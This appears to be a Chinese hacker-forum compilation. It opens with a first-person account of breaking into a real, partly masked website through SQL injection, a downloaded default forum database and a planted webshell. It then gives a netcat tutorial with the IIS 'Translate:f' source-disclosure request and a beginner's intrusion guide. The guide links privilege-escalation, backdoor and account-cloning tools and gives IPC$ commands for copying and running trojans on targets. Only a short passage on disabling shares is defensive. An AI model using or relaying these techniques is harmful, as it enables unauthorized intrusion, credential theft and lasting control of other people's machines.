http://www.***.com/newsshow.asp?id=808 asp的 看来是有搞头了。。。
在后面加了 and 1=1 返回 正常了。。。。
and 1=2
ADODB.Field 错误 ‘80020009’
BOF 或 EOF 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个
当前的记录。
/newsshow.asp,行0
确定有注入漏洞。。。。
提交http://www.****/newsshow.asp?id=808%20and%20(select%20count
(*)%20from%20sysobjects)>0
Microsoft JET Database Engine 错误 ‘80040e37’
Microsoft Jet 数据库引擎找不到输入表或查询 ‘sysobjects’。 确定它是否存在,
以及它的名称的拼写是否正确。
/newsshow.asp,行84
倒。。。看来是access 数据库了。。。。那就拿去NB 来跑吧。。顺便拿去明小
子的那个旁注扫后台地址 鄙人都喜欢这样做的。。西西 一举两得嘛
一回儿。。后台路径是出来了
http://www.**i.com/../admin.asp
可NB里面总是不出来。。郁闷。。汗。。估计表名被管理员改的太BT了。。
猜都猜不到。。。手工试了几个从站面上拿来的。。也全不是。。郁闷中。。
后来发现了个论坛。。go go go 骑着偶的乌龟去了。。。
是动网的 不过被管理员改的面目全非了。。。连一先在线情况,,用户名都不能
看见。。。总共有多少的注册用户都不给你看。。汗。。真够小气的哦。。咱们
还是忙咱们的 不管他。。
哈哈。。随便注册了个用户。。
在个人资料里试试上传了(台下的 仍鸡蛋了。。都NNN年的漏洞了怎么可能还
有,。,,)也不能这么说啊。。。有想法当然要去实践了嘛。。西西
随便选张图片看看 上传的功能还在不在。。哈哈。
文件格式不正确 [ 重新上传 ] ????
我选的是图片耶 不是马啊。。怎么不正确?
然后试了下马 也一样。。估计是什么都不可以上传。。BT
在去发张帖子看看。。那里也有上传的
Server.MapPath() 错误 ‘ASP 0174 : 80004005’
无效路径字符
/bbs/post_upfile.asp,行125
MapPath 方法的路径参数中有无效字符 ‘/’ 或 ‘/’。
郁闷了。。。怎么搞的。。连这个都不放过。。汗。。决。。
现在想想还有什么办法没试。。。。对了。。默认的数据库。。
顺手在bbs/后面加了data/dvbbs7.mdb 哈哈 提示下载。。HOHO~~~
这么爽。。。5M多。。一分钟就完了 (因为偶的网速慢啊)
找到DV-LOG 在字段跟关键字里分别选择L-content 跟pass
接下来不用我说吧。。找到管理员帐号跟密码就行了哈。。。
顺利的登陆进去。。。接下来当然是传马了 得到个webshell在说。。。。
一时想起来了。。。连上传页面都没了。。还怎么得webshell?
备份功能不行了啊。。怎么办。。。郁闷中。。。后来在群里叫了浩南。叫他帮
我看下。。十几分种后。。他给了我webshell 西西。。感谢中。。
不过咱们要知道的是方法。。所以就缠着他问他了。。。
他跟我来了个远程协助。。。偶是看着他做的。。。
(下面我就引用他的话了,仔细看了哦。。西西)
原来在登陆后台后。。里面有个系统设置。。有个 UploadFile/
上传目录是这个 按说UploadFile/应该没错的 论坛的所有的都是传在
UploadFile/目录下 现在我们也放在这个目录下。不是没有权限
而是这个目录 也许你发现不了什么 UploadFile/如果上传成功的话。这个目录就
变成了UploadFile//这个目录而计算机里根本就没有UploadFile/文件夹
只有UploadFile文件夹 我们来修改一下
也就是把UploadFile/ 后面的斜杆去掉。。。变成UploadFile
现在我去前台来上传 发表话题。。随便选个文件。。。
1个文件上传成功,目前今天总共上传了1个附件 [ 继续上传 ]
西西 现在不是变成可以上传了吗??
OK。。。。现在上传图片。到后台备份。。。成功 得到webshell
不过你要把他的设置给改回来的哦。。。。
在次感谢浩南的无私帮助。thank you very much ^_^
(数据库是MDB 的是否能利用数据库插马的方法来得webshell请大虾指点)
NC的使用
命令:nc –h
技巧:win98用户可以在autoexec.bat加入
path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat)
1、基本使用
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
其中端口号可以指定一个或者用lo-hi式的指定范围。
例如:扫描端口
tcp扫描
C:/nc>nc -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?)
net [192.168.0.80] 139 (netbios-ssn) open
net [192.168.0.80] 138 (?)
net [192.168.0.80] 137 (netbios-ns)
net [192.168.0.80] 136 (?)
net [192.168.0.80] 135 (epmap) open
net [192.168.0.80] 81 (?) open
net [192.168.0.80] 80 (http) open
net [192.168.0.80] 79 (finger)
net [192.168.0.80] 25 (smtp) open
net [192.168.0.80] 24 (?)
net [192.168.0.80] 23 (telnet)
net [192.168.0.80] 21 (ftp)
udp扫描
C:/nc>nc -u -v -z -w2 192.168.0.80 1-140
net [192.168.0.80] 140 (?) open
net [192.168.0.80] 139 (?) open
net [192.168.0.80] 138 (netbios-dgm) open
net [192.168.0.80] 137 (netbios-ns) open
net [192.168.0.80] 54 (?) open
net [192.168.0.80] 53 (domain) open
net [192.168.0.80] 38 (?) open
net [192.168.0.80] 37 (time) open
net [192.168.0.80] 7 (echo) open
二、高级应用
1.Window用法:
(1)IE的MIME欺骗
www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)
打开这个页面,有个
http://www.try2hack.nl/cgi-bin/level7.pl页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft.com/ms.htm重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放上
http://www.try2hack.nl/cgi-bin/level7.pl的链接?看看页面的源代码,level7.pl是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,level7.pl这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可以哄对方了:
nc www.try2hack.nl 80 [enter]
GET /cgi-bin/level7.pl HTTP/1.1 [enter]
Accept: image/gif, image/x-xbitmap, application/msword, */* [enter]
Referer:
http://www.microsoft.com/ms.htm [enter]
Accept-Language: zh-cn [enter]
Accept-Encoding: gzip, deflate [enter]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) [enter]
Host: www.try2hack.nl [enter]
Connection:
Keep-Alive [enter]
注意,如果出现HTTP 400时,说明你输入格式有问题,出现httpd 200回应时,就给出结果了:
哈哈!赶快去实现一下(实践是成功之母)
(2)IIS 5 “Translate:f” 显示代码脆弱点
Translate:f脆弱点的机制:发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型(例如.ASP或者global.asa)。这些文件是用于服务器上运行的,绝不会到客户机上去,而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上,而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f,并有一个反斜杠”/”附于URL之后。下面就有这样的一个例子([CRLF]代表回车字符)
注意 GET global.asa 后的反斜杠以及Translate:f头信息。
GET /global.asa/ HTTP/1.0
Host:192.168.0.1
User-Agent:SensePostData
Content-Type:application/x-www-form-urlencoded
Translate:f
[CRLF]
[CRLF]
将以上内容保存在一个文本文件中(例如example.txt)
然后向一个有这个漏洞的服务器发送
c:/>type example.txt | nc –nvv 192.168.0.80 80
(UNKNOWN) [192.168.0.80] 80 (?) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 Dec 2002 08:50:46 GMT
Content-Type: application/octet-stream
Content-Length: 2790
ETag: “0448299fcd6df1:bea”
Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
菜鸟变黑客高手(整理版)绝对对你有用
常用类软件:
黑白屋:
http://www.play8.net/
华军软件
http://www.newhua.com/ (根据物理位置自行选择速度快的镜像)
中国下载
http://download.com.cn/ (使用查找功能可找到大部份软件)
东丽在线
http://www.tjdl.net/softdown/ (不错的软件下载站,类似华军)
世纪下载
http://www.21sx.com/ (也是一个不错的下载站)
安全类软件:
黑白屋:
http://www.play8.net/index2.htm
安全焦点
http://www.xfocus.net/tool.php
安全资讯
http://www.aurorasafe.com/list.asp
天天安全
http://www.ttian.net/download/list.php
网嗅下载
http://netsill.com/download/default.asp
灰色轨迹
http://www.sandflee.net/down/list.asp
鹰派下载
http://211.155.27.112/~technic/down/
(一些大型精典安全软件下载,不过有时候就上不去)
找代理在这里:
代理使用方法
http://extend.hk.hi.cn/~sunbird/freeproxy_why.html
(各种代理使用方法介绍)
代理服务器地址
http://www.salala.com/proxy_index.htm
(每日更新的,大部份是HTTP代理)
代理服务器地址
http://www.emaga.net/8341/myann
(每日更新的,大部份是SOCKS代理,既QQ代理)
注册码在这里:
第六空间
http://www.sixthroom.com/down/qt/ser.rar (注册码大全下载)
注册码搜索
http://www.netpaste.com/code/
孤月注册码
http://www.guyue.com/key/
第二章——关于被入侵
简单说明:
经常有帖子说:“我中木马啦,怎么办?”、“我被攻击了”,“我的windows有问题,是不是被入侵啦?”等等。哪么如果你怀疑系统被入侵的话,请你首先看看日志的记录或是有什么变化,然后你应该查看可疑进程(win98需要用相关工具)、注册表启动项、服务、开放端口等,然后更新病毒库,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以到杀毒软件公司的主页上找。另外,系统不正常也可能是操作失误引起的。这里不是“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。
相关工具:
Active Ports 监视自己电脑的端口,并做出相应处理。
http://www.sixthroom.com/down/aq/cn_aports.rar
windows优化大师5.1 它的进程管理功能不错。更是目前最好的系统优化软件。
http://www.sixthroom.com/down/aq/wom.rar
Windows 基准安全分析器 1.0 (特别推荐,详细资料看下载说明吧)
http://www.sixthroom.com/down/admin/aq/mbsasetup.msi
Fport-2.0 查看端口关联的进程 (应用于9x/me)
http://www.sixthroom.com/down/admin/aq/fport.zip
mport 比fport更胜一筹的工具
http://www.sixthroom.com/down/admin/aq/mport.zip
KV3000江民杀毒王(正式版+钥匙盘)
http://www.kxweb.net/down/down.asp?downid=1&id=14
金山毒霸2003正式版
http://www.kxweb.net/down/down.asp?downid=1&id=11
相关资料:
黑白屋文档中心:
http://www.play8.net/cgi-bin/news/article/list.cgi
104种木马的清除方法
http://asp2.6to23.com/ebug88/net/article/net004.htm
清除恶意网页的破坏
http://assistant.3721.com/safe.htm
2000系统进程总列表
http://sinbad.zhoubin.com/read.html?board=Win&num=73
木马的检测、清除及其预防 天网安全检测
http://sky.net.cn/main/view.php?cid=170
蓝盾安全检测
http://www.bluedon.com/bluedonserver.asp
第三章——基础知识和入侵步骤
简单说明:
电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的文章。看完这部分的文章,你也只是算站到了门口,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通常所说的利用漏洞。
基础知识网址:
http://tech.163.com/tm/010213/010213_14563.html
http://tech.163.com/tm/010213/010213_14564.html
http://tech.163.com/tm/010214/010214_14632.html
http://tech.163.com/tm/010214/010214_14634.html
http://tech.163.com/tm/010214/010214_14638.html
一、要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的可能有的漏洞。这样既提高效率又不易被记录日志。
几种扫描器的简单使用教程:
http://www.chinesehack.org/file/show.asp?id=5614
入侵技术介绍–目标探测:
http://www.sixthroom.com/ailan/f … 2&RootID=279&ID=279
二、找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。很多要依靠自己的知识积累及对系统的掌握及熟悉程度,这里就不多说了。 下面提供几个提供漏洞资料的网站供大家参考。
天极网
http://www.myhard.com/76284138209935360/index.shtml
绿盟科技
http://www.nsfocus.net/index.php?act=sec_bug
五月安全网
http://bgbbs.www70.cn4e.com/article.asp?cat_id=2
中国信息安全
http://www.chinafirst.org.cn/ruodian/advisory.php
三、利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。以下介绍两篇SHELL编程的文章给大家。
中国软件
http://www.csdn.net/develop/article/14/14219.shtm
程序春秋
http://www.cbinews.com/developer/showcontent.php?articleid=2193
四、shell是有权限差别的。最高权限–管理员权限才是我们的目标。所以有时会有提升权限的问题。当然,这也是利用了漏洞。以下介绍几篇文章。
Win2K 提升权限漏洞
http://www.yesky.com/20010530/182273.shtml
Microsoft SQL Server Webtasks权限提升漏洞
http://it.rising.com.cn/newSite/ … 10/31-153502052.htm
Linux kernel ptrace提升权限漏洞
http://levinstorm.myetang.com/main/holes/unix/005.html
NT/2000提升权限的方法小结
http://home.lufeng.net/wolf/Computer/luodong/2000tisheng.htm
IIS提升权限漏洞
http://www.ddhome.net/hole/14.htm
五、有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。在这介绍给大家介绍一下现在最流行的3389吧。更多的文章请
www.sixthroom.com。
远程开启3389终端服务
http://www.sandflee.net/wawa/3389-1.htm
建立你的3389肉鸡
http://www.sandflee.net/wawa/sz-3389.htm
六、为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马、破administrator的密码,手段不一而足。各位慢慢学吧。
永远的后门
http://www.ttian.net/article/show.php?id=259
Win2000 下Ping 后门的简单实现
http://www.landun.org/wenzhang/images/xiaoran/article/154.html
帐号克隆
http://www.netXeyes.org/CA.exe
帐号检查
http://www.netXeyes.org/CCA.exe
暴力激活成功教程LC4
http://www.andyxu.net/banana/tools_2/lc4.rar
端口知识介绍:
相关工具:
扫描端口是扫描器的基本功能,工具太多了。提供两个给大家,更多的参看后面。
X-Port.zip下载
http://www.xfocus.net/download.php?id=327
PortReady下载
http://dotpot.533.net/dpsoft/PortReady1.6.zip
相关资料:
端口扫描简介
http://www.netscreen.com.cn/suml/zhishiyy/jingong/duankougj.htm0
系统服务及木马默认端口表
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/41250634.htm
端口大全
http://www.sixthroom.com/ailan/f … 2&RootID=268&ID=268
常用默认端口列表及功能中文注解
http://www.sixthroom.com/ailan/f … 2&RootID=267&ID=267
常见端口详解及部分攻击策略
http://www.sixthroom.com/ailan/f … 2&RootID=266&ID=266
相关资料:
如何成为一名黑客
http://263.aka.org.cn/Docs/hacker-howto_2001.html
提问的技巧
http://bbs.online.sh.cn/eliteart … 44fb3b6efa4377e48ae
TCP/IP基础
http://www.linkwan.com/gb/routertech/netbase/tcpip.htm
网络攻防教程
http://www.netsill.com/wenzhang/list.asp?id=115
网络入侵步骤及思路
http://www.iamguo.com/bh3/hackguide2.htm
拒绝背后黑手的窥探 IPC$漏洞大揭秘
http://computer.szptt.net.cn/2002-04-27/nw2002042700109.shtml
全球ip分配表
http://519519.vicp.net/lb5000//usr/3/3_11.txt
黑客入门教程
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/43934529.htm
菜鸟XXX客快速入门
http://netsafe.ayinfo.ha.cn/sqxw/2002117172333.htm
几种流行的入侵工具与讲解
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/44188520.htm
常见端口详解及部分攻击策略
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/-90637.htm
攻击的各种级别
http://www.pttc.yn.cninfo.net/dtsy/nettech/netanquan/39825935.htm
第四章——关于命令的使用
简单说明:
windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单–》帮助中可以搜索到“windows 2000 命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在命令行方式下加/?或-h参数可以查看帮助,其他内置的命令当然也可以。还有就是掌握一些常用的DOS命令也是非常有必要的。因为WINSOWS不管发展到哪一天,它也都不可能取代DOS,至少现在还不行。NET命令更是最常用的网络命令,想做一个黑客,更是你所必需掌握的。掌握一些LINUX命令也是很有必要的。希望下面的资料对大家有所帮助。
相关帖子:
DOS下常用网络相关命令解释
http://www.jiejingwang.com/list.asp?id=521
入门网络命令
http://www.jiejingwang.com/list.asp?id=520
Win2000命令全集
http://www.sixthroom.com/ailan/f … 2&RootID=343&ID=343
Windows XP下cmd命令详解
http://www.sixthroom.com/ailan/f … 2&RootID=366&ID=366
ftp命令:
http://www.hotcy.org/chem/campous/article/ftp.htm
telnet命令简介:
http://www22.brinkster.com/lastknife/netbase/telnetorder.htm (以上地址简单介绍了TELNET命令,
http://www.sixthroom.com/ailan/f … 2&RootID=277&ID=277
net命令基本用法:
http://www.yy0730.com/1/1/1/wen/list.asp?id=12
tftp命令: 由于TFTP命令过于简单,请自行使用“TFTP /?”进行查询。下面在给出一个参照的
实例:
http://levinstorm.myetang.com/main/tutorials/hacking/006.html
一般入侵所需要的几个常用命令:
http://www.yixindz.com/badschool/hacker/hack_commands.htm
Linux 的常用网络命令
http://www.jiejingwang.com/list.asp?id=522
第五章——关于windows98
简单说明:
这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。
由于98的网络功能并不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络服务启动,众所周知漏洞是由于各种服务的功能设计并不完美,所以才产生的,也就是说没有漏洞也就很难入侵,找不到什么可利用的漏洞。这给入侵带来的困难是难以想像的.共享入侵,算是最常见的攻击方式了。
相关资料:
共享入侵
http://www.sixthroom.com/ailan/f … 2&RootID=269&ID=269
入侵windows98系统
http://www.sixthroom.com/ailan/f … 2&RootID=270&ID=270
win98入侵网吧详解
http://www.sixthroom.com/ailan/f … 2&RootID=271&ID=271
其实还有些方法,比如嗅探密码、发病毒和木马到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什么意思,就此打住(这是前辈说的,他老人家都说打住了,哪我也打住,其实是我也不知道说什么,呵呵)。
基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基于NT技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开3389的肉鸡就算是回避了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。(在这里我也要加一句就是如果你是用98系统的话,哪么选择榕哥的流光98版也是不错的。不过有很多功能也还是无法使用)。
鉴于98的问题技术含量不高、没有深入探讨价值,所以就谈到这里吧。(个人观点)
相关工具:
NetPass 1.0 激活成功教程98共享密码
http://lovezxd.myetang.com/indexpage/indextool/NetPass.zip
cain v2.5 综合激活成功教程工具
http://www.qq888.com/down/download.asp?Did=968
exeBinderZ 1.3 EXE捆绑机
http://www.heibai.net/download/show.php?id=3028&down=3
SUPERSCAN3.0中文版下载
http://download.pchome.net/php/d … erscanv30.exe&svr=3
X-SCAN2.3下载
http://www.xfocus.net/download.php?id=366
流光98下载
http://www.netxeyes.com/cfluxay2k1for98setup.exe(因榕哥不愿意看到加了补丁的作品,为了尊重他老人家,所以这里不提供补丁下载,需要的就自己去找吧)。
终端服务客户端
http://arm.533.net/hack/winterminal.zip (既3389连接器)
第6章——关于ipc$、空连接和默认共享
简单说明:
******首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。******个人认为这段很重要,因为很多人根本就不知道什么是空连接什么是IPC$.建议不知道的朋友仔细看一下吧.这种问题,不应该不知道的.
相关帖子:
拒绝背后黑手的窥探 IPC$漏洞大揭秘
http://www.sixthroom.com/ailan/f … 2&RootID=281&ID=281
IPC入侵全攻略
http://www.sixthroom.com/ailan/f … 2&RootID=278&ID=278
win2k中C驱等的默认共享是怎么回事
http://www.sixthroom.com/ailan/f … 2&RootID=282&ID=282
取消默认共享≠安全
http://js00.51.net/23/wudi/show. … p;id=20021017212524
常见问题和回答:
一、怎样建立空连接,它有什么用?
答:使用命令 net use /IPipc$ “” /user:”” 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧:
在NT/2000下的空连接
http://www.sixthroom.com/ailan/f … 2&RootID=280&ID=280
解剖WIN2K下的空会话
http://www.sixthroom.com/ailan/f … 2&RootID=283&ID=283
二、为什么我连不上IPC$?
答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2、确认你的命令没有打错。正确的命令是: net use /目标IPipc$ “密码” /user:”用户名”
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用””表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。各位看着办吧,呵呵。
三、怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
四、怎样映射和访问默认共享?
答:使用命令net use z: /目标IPc$ 密码” /user:”用户名” 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe /IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: /IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用””将路径全引住。
五、如何删除映射和ipc$连接?
答:用命令 net use /IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
六、连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
七、怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接:
http://www.sixthroom.com/ailan/f … 2&RootID=284&ID=284
第7章——关于扫描出的漏洞
简单说明:
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。如果你希望了解的多一些,最好经常到发布漏洞比较快的网站走一走,漏洞的利用是一个不段积累的过程。时间长了相信你就体会到了。
漏洞搜索:
绿盟的引擎
http://www.nsfocus.net/index.php?act=sec_bug
蓝盾的引擎
http://www.landun.org/zhongyao/sousuo.htm
补天网的引擎
http://www.patching.net/otherweb/leak/leakindex.asp
安全焦点的引擎
http://www.xfocus.net/vuln/index.php
小凤居的引擎
http://lilitou1.myetang.com/
相关帖子:
一个CGI漏洞的发现和利用
http://www.sixthroom.com/ailan/f … 2&RootID=285&ID=285
cgi漏洞大全
http://www.sixthroom.com/ailan/f … 2&RootID=293&ID=293
常见CGI漏洞及应对二
http://www.sixthroom.com/ailan/f … 2&RootID=286&ID=286
常见CGI漏洞及应对一
http://www.sixthroom.com/ailan/f … 2&RootID=287&ID=287
Windows 2000漏洞集锦1
http://www.sixthroom.com/ailan/f … 2&RootID=288&ID=288
Windows 2000漏洞集锦2
http://www.sixthroom.com/ailan/f … 2&RootID=289&ID=289
Windows 2000漏洞集锦3
http://www.sixthroom.com/ailan/f … 2&RootID=290&ID=290
Windows 2000漏洞集锦4
http://www.sixthroom.com/ailan/f … 2&RootID=291&ID=291
Windows 2000漏洞集锦5
http://www.sixthroom.com/ailan/f … 2&RootID=292&ID=292
ASP漏洞大全
http://www.sixthroom.com/ailan/f … 2&RootID=294&ID=294
IIS漏洞整理一
http://www.sixthroom.com/ailan/f … 2&RootID=295&ID=295
IIS漏洞整理二
http://www.sixthroom.com/ailan/f … 2&RootID=296&ID=296
中国网络安全响应中心各种漏洞大全
http://www.cns911.com/holes/linux/list.php
第8章——关于提升权限
简单说明:
黑客的最终目标就是得到root(即win中的admin)权限。一个真正的黑客会把一次入侵当做是自己的一件作品,不会轻易放弃,但是有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。 还要补充一点,就是在拿到一个现成的后门软件,或是一个木马的时候,一定要先看看说明。至少你应该知道这个后门运行后的效果吧?更有些人上传了某个后门软件或是木马到目标后就认为完事了,你不执行它就是传个地雷上去又有什么用呢?
相关工具:
erunasx 利用Debug Registers漏洞提升权限
http://www.qq888.com/down/download.asp?Did=796
Windows NT/2000权限提升工具,可以将任意用户提升到SYSTEM级别的权限。漏洞出在smss.exe中的DEBUG子系统,所有普通用户都可以通过该漏洞获得对系统中任意进程或线程句柄的控制,从而可以以SYSTEM或管理员权限执行任意命令。2、使用方法:假设我们已经获得一台机器上的一个GUEST用户(或其他普通用户),现在我们要这个工具来获得系统最高权限。进行如下步骤:把ERunAsX.exe和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下,例如C:下。以GUEST身份运行”ERunAsX 要执行命令”,例如”ERunAsX cmd.exe”,这时执行的命令是以SYSTEM 权限运行的…(请注意:具体使用以软件内英文说明为准,内附该BUG解决办法)
PipeUpAdmin 对sp1及更低有效
http://maopao.com/down/download.asp?Did=69
ISPC 利用IIS的漏洞,详见自带说明
http://www.cnsq.net/sq88/down/show.asp?id=572&down=1
PHPBB论坛权限提升
http://www.newyouth.org/softdown … .0.exploit_code.zip
WIN帮助文件溢出(可用于XP)
http://www.newyouth.org/softdown … ack/chmoverflow.zip
NT/2K权限提升工具GetAdmin下载
http://www.csdn.net/cnshare/soft/openfile.asp?kind=1&id=9807
相关帖子:
NT/2000提升权限的方法小结
http://www.sixthroom.com/ailan/f … 2&RootID=297&ID=297
关于WIN2000的入侵,以及安全防御等问题(文章包含一次利用U漏洞提高权限的过程)
http://www.sixthroom.com/ailan/f … 2&RootID=298&ID=298
UNICODE漏洞介绍及入侵
http://www.sixthroom.com/ailan/f … 2&RootID=299&ID=299
